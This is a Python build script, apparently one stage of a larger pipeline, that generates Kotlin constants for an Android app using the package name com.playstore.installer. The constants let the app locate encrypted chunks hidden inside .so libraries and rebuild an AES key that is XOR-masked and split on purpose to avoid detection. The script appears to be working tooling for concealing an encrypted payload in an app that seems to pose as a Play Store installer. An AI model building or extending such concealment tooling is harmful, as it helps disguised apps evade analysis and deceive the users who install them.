#!/usr/bin/env python3
"""
chunk_constants_gen.py — Phase 3 Step 24

Reads the embedded chunk manifest and generates ChunkConstants.kt
containing XOR-masked offset/size constants for each chunk.

At runtime, Nova reads these constants, unmasks them with the XOR key,
then reads the chunk bytes from the .so file at the correct offset.

Usage:
  python3 scripts/chunk_constants_gen.py \
    --manifest /tmp/chunk_manifest_embedded.json \
    --out-kt app/src/main/java/.../ChunkConstants.kt \
    --package com.playstore.installer
"""

import os
import json
import argparse


def generate_chunk_constants(manifest_path: str, out_kt: str, package: str):
    """Step 24: Generate Kotlin constants file with XOR-masked offsets/sizes."""

    with open(manifest_path) as f:
        manifest = json.load(f)

    n_chunks   = manifest['n_chunks']
    xor_key    = manifest['xor_mask_key']
    key_hex    = manifest['key_hex']
    iv_hex     = manifest['iv_hex']
    sha512     = manifest['sha512_hash']
    sha256     = manifest['sha256_hash']
    embedded   = manifest['embedded']
    build_uuid = manifest['build_uuid']
    build_hash = manifest['build_hash']

    # XOR-mask the encryption key and IV too (split for extra obfuscation)
    key_bytes = bytes.fromhex(key_hex)
    iv_bytes  = bytes.fromhex(iv_hex)

    # Mask key: XOR each 4-byte word with xor_key
    def mask_bytes_to_ints(b: bytes) -> list:
        ints = []
        for i in range(0, len(b), 4):
            word = int.from_bytes(b[i:i+4].ljust(4, b'\x00'), 'little')
            ints.append(word ^ xor_key)
        return ints

    masked_key = mask_bytes_to_ints(key_bytes)
    masked_iv  = mask_bytes_to_ints(iv_bytes)

    # Split XOR key itself for storage (never as single literal)
    xor_hi = (xor_key >> 16) & 0xFFFF
    xor_lo = xor_key & 0xFFFF

    lines = []
    lines.append(f"package {package}")
    lines.append("")
    lines.append("/**")
    lines.append(" * ChunkConstants — auto-generated by chunk_constants_gen.py")
    lines.append(" * DO NOT EDIT — regenerated each build.")
    lines.append(" * All offsets/sizes XOR-masked. Key/IV split + masked.")
    lines.append(" * Phase 3 Step 24.")
    lines.append(" */")
    lines.append("internal object ChunkConstants {")
    lines.append("")
    lines.append(f"    // Build identity")
    lines.append(f'    const val BUILD_UUID  = "{build_uuid}"')
    lines.append(f'    const val BUILD_HASH  = "{build_hash[:16]}"')
    lines.append(f'    const val N_CHUNKS    = {n_chunks}')
    lines.append("")

    # XOR key split — never appears as single value
    lines.append(f"    // XOR unmask key — split, never appears as single literal")
    lines.append(f"    private const val XK_HI = 0x{xor_hi:04X}")
    lines.append(f"    private const val XK_LO = 0x{xor_lo:04X}")
    lines.append(f"    val XOR_KEY: Int get() = (XK_HI shl 16) or XK_LO")
    lines.append("")

    # Masked AES key parts
    lines.append(f"    // Masked AES-256 key (32 bytes as 8 masked ints)")
    # Convert unsigned ints to signed Kotlin Int literals
    def to_kotlin_int(v):
        # Values > 0x7FFFFFFF must be negative in signed 32-bit
        if v > 0x7FFFFFFF:
            return str(v - 0x100000000)  # signed decimal
        return str(v)

    key_parts = ", ".join(to_kotlin_int(v) for v in masked_key)
    lines.append(f"    val MASKED_KEY = intArrayOf({key_parts})")
    lines.append("")

    # Masked IV parts
    lines.append(f"    // Masked AES GCM IV (12 bytes as 3 masked ints)")
    iv_parts = ", ".join(to_kotlin_int(v) for v in masked_iv)
    lines.append(f"    val MASKED_IV = intArrayOf({iv_parts})")
    lines.append("")

    # Integrity hashes (split to avoid single large literal)
    lines.append(f"    // Dual integrity hashes (SHA-512 + SHA-256)")
    sha512_a = sha512[:64]
    sha512_b = sha512[64:]
    lines.append(f'    private const val H512A = "{sha512_a}"')
    lines.append(f'    private const val H512B = "{sha512_b}"')
    lines.append(f'    val SHA512_HASH: String get() = H512A + H512B')
    lines.append(f'    const val SHA256_HASH = "{sha256}"')
    lines.append("")

    # Per-chunk offset/size masked constants
    lines.append(f"    // Per-chunk masked offset/size for arm64-v8a")
    for chunk_embed in embedded:
        idx    = chunk_embed['chunk_index']
        arm64  = chunk_embed['abis'].get('arm64-v8a', {})
        so_name = chunk_embed['so_name']
        moff   = arm64.get('masked_offset', 0)
        msz    = arm64.get('masked_size', 0)
        csha   = manifest['chunks'][idx]['sha256']

        lines.append(f"    // chunk {idx}: {so_name}")
        lines.append(f"    const val CHUNK_{idx:02d}_SO      = \"{so_name}\"")
        moff_signed = moff if moff <= 0x7FFFFFFF else moff - 0x100000000
        lines.append(f"    val CHUNK_{idx:02d}_MOFF_64 = {moff_signed}")
        msz_signed = msz if msz <= 0x7FFFFFFF else msz - 0x100000000
        lines.append(f"    val CHUNK_{idx:02d}_MSZ_64  = {msz_signed}")
        lines.append(f'    const val CHUNK_{idx:02d}_SHA256  = "{csha[:32]}"')
        lines.append("")

    # Per-chunk offset/size for armeabi-v7a
    lines.append(f"    // Per-chunk masked offset/size for armeabi-v7a")
    for chunk_embed in embedded:
        idx    = chunk_embed['chunk_index']
        arm32  = chunk_embed['abis'].get('armeabi-v7a', {})
        moff   = arm32.get('masked_offset', 0)
        msz    = arm32.get('masked_size', 0)

        moff32_signed = moff if moff <= 0x7FFFFFFF else moff - 0x100000000
        lines.append(f"    val CHUNK_{idx:02d}_MOFF_32 = {moff32_signed}")
        msz32_signed = msz if msz <= 0x7FFFFFFF else msz - 0x100000000
        lines.append(f"    val CHUNK_{idx:02d}_MSZ_32  = {msz32_signed}")

    lines.append("")

    # Unmask helper functions
    lines.append("    /** Unmask a masked offset value */")
    lines.append("    fun unmaskOffset(masked: Int): Long = (masked xor XOR_KEY).toLong() and 0xFFFFFFFFL")
    lines.append("")
    lines.append("    /** Unmask a masked size value */")
    lines.append("    fun unmaskSize(masked: Int): Int = masked xor XOR_KEY")
    lines.append("")

    # Unmask key function
    lines.append("    /** Reconstruct AES key bytes from masked ints */")
    lines.append("    fun getAesKey(): ByteArray {")
    lines.append("        val key = ByteArray(32)")
    lines.append("        val xk = XOR_KEY")
    lines.append("        for (i in MASKED_KEY.indices) {")
    lines.append("            val word = MASKED_KEY[i] xor xk")
    lines.append("            key[i*4+0] = (word and 0xFF).toByte()")
    lines.append("            key[i*4+1] = ((word shr 8) and 0xFF).toByte()")
    lines.append("            key[i*4+2] = ((word shr 16) and 0xFF).toByte()")
    lines.append("            if (i*4+3 < 32) key[i*4+3] = ((word shr 24) and 0xFF).toByte()")
    lines.append("        }")
    lines.append("        return key")
    lines.append("    }")
    lines.append("")

    # Unmask IV function
    lines.append("    /** Reconstruct AES GCM IV bytes from masked ints */")
    lines.append("    fun getAesIv(): ByteArray {")
    lines.append("        val iv = ByteArray(12)")
    lines.append("        val xk = XOR_KEY")
    lines.append("        for (i in MASKED_IV.indices) {")
    lines.append("            val word = MASKED_IV[i] xor xk")
    lines.append("            iv[i*4+0] = (word and 0xFF).toByte()")
    lines.append("            iv[i*4+1] = ((word shr 8) and 0xFF).toByte()")
    lines.append("            iv[i*4+2] = ((word shr 16) and 0xFF).toByte()")
    lines.append("            if (i*4+3 < 12) iv[i*4+3] = ((word shr 24) and 0xFF).toByte()")
    lines.append("        }")
    lines.append("        return iv")
    lines.append("    }")
    lines.append("")

    # Get .so path helper
    lines.append("    /** Get the .so filename for a given chunk index */")
    lines.append("    fun getSoName(chunkIndex: Int): String {")
    lines.append("        return when (chunkIndex) {")
    for chunk_embed in embedded:
        idx = chunk_embed['chunk_index']
        so  = chunk_embed['so_name']
        lines.append(f'            {idx} -> "{so}"')
    lines.append("            else -> throw IllegalArgumentException(\"Invalid chunk: $chunkIndex\")")
    lines.append("        }")
    lines.append("    }")
    lines.append("")

    # Get masked offset/size helper
    lines.append("    /** Get masked offset for a chunk in current ABI */")
    lines.append("    fun getMaskedOffset(chunkIndex: Int, is64bit: Boolean): Int {")
    lines.append("        return when (chunkIndex) {")
    for chunk_embed in embedded:
        idx   = chunk_embed['chunk_index']
        moff64 = chunk_embed['abis'].get('arm64-v8a', {}).get('masked_offset', 0)
        moff32 = chunk_embed['abis'].get('armeabi-v7a', {}).get('masked_offset', 0)
        moff64s = moff64 if moff64 <= 0x7FFFFFFF else moff64 - 0x100000000
        moff32s = moff32 if moff32 <= 0x7FFFFFFF else moff32 - 0x100000000
        lines.append(f"            {idx} -> if (is64bit) {moff64s} else {moff32s}")
    lines.append("            else -> 0")
    lines.append("        }")
    lines.append("    }")
    lines.append("")

    lines.append("    /** Get masked size for a chunk */")
    lines.append("    fun getMaskedSize(chunkIndex: Int, is64bit: Boolean): Int {")
    lines.append("        return when (chunkIndex) {")
    for chunk_embed in embedded:
        idx   = chunk_embed['chunk_index']
        msz64 = chunk_embed['abis'].get('arm64-v8a', {}).get('masked_size', 0)
        msz32 = chunk_embed['abis'].get('armeabi-v7a', {}).get('masked_size', 0)
        msz64s = msz64 if msz64 <= 0x7FFFFFFF else msz64 - 0x100000000
        msz32s = msz32 if msz32 <= 0x7FFFFFFF else msz32 - 0x100000000
        lines.append(f"            {idx} -> if (is64bit) {msz64s} else {msz32s}")
    lines.append("            else -> 0")
    lines.append("        }")
    lines.append("    }")
    lines.append("}")
    lines.append("")

    # Write file
    os.makedirs(os.path.dirname(out_kt), exist_ok=True)
    with open(out_kt, 'w') as f:
        f.write('\n'.join(lines))

    print(f"[Step 24] ✅ ChunkConstants.kt written: {out_kt}")
    print(f"  Chunks: {n_chunks}")
    print(f"  XOR key: 0x{xor_key:08X} (split as HI=0x{xor_hi:04X} LO=0x{xor_lo:04X})")


def main():
    parser = argparse.ArgumentParser(description='Phase 3 Chunk Constants Generator')
    parser.add_argument('--manifest', required=True, help='Embedded chunk manifest JSON')
    parser.add_argument('--out-kt',   required=True, help='Output ChunkConstants.kt path')
    parser.add_argument('--package',  required=True, help='Kotlin package name')
    args = parser.parse_args()

    generate_chunk_constants(args.manifest, args.out_kt, args.package)


if __name__ == '__main__':
    main()
